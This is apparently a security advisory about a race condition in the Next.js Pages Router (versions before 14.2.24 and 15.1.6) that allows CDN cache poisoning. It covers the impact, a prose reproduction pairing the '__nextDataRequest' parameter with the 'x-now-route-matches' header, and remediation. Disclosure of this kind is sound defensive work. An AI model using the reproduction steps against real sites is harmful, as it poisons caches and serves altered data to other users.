Next.js Race Condition Vulnerability in Pages Router Leading to Cache Poisoning

A race condition vulnerability has been identified in Next.js, specifically in versions prior to 14.2.24 and 15.1.6. This issue affects the Pages Router under certain misconfigurations, causing standard endpoints to inadvertently serve `pageProps` data instead of regular HTML. The vulnerability arises from a race condition between two requests: one with the `?__nextDataRequest=1` query parameter and another with the `x-now-route-matches` header. Some Content Delivery Network (CDN) providers may cache `200 OK` responses without explicit `cache-control` headers, allowing poisoned responses to persist and be served to subsequent users.

Impact

Exploitation of this vulnerability allows for CDN cache poisoning, where an attacker can inject non-cacheable data response into a cacheable request, causing the poisoned response to be served to other users. While this does not allow for backend access or privilege escalation, it can disrupt the intended user experience by serving incorrect or maliciously crafted data.

Reproduction

The vulnerability can be reproduced by sending two simultaneous requests to a Next.js application with the Pages Router. One request should include the `?__nextDataRequest=1` query parameter, while the other should include the `x-now-route-matches` header. If the timing is right, the first request's response can be injected into the second request, taking advantage of CDN caching.

Remediation

Users can upgrade to Next.js versions 15.1.6 or 14.2.24 and later. For those unable to upgrade immediately, it is recommended to strip the `x-now-route-matches` header from incoming requests at the CDN and to set `cache-control: no-store` for all at-risk responses.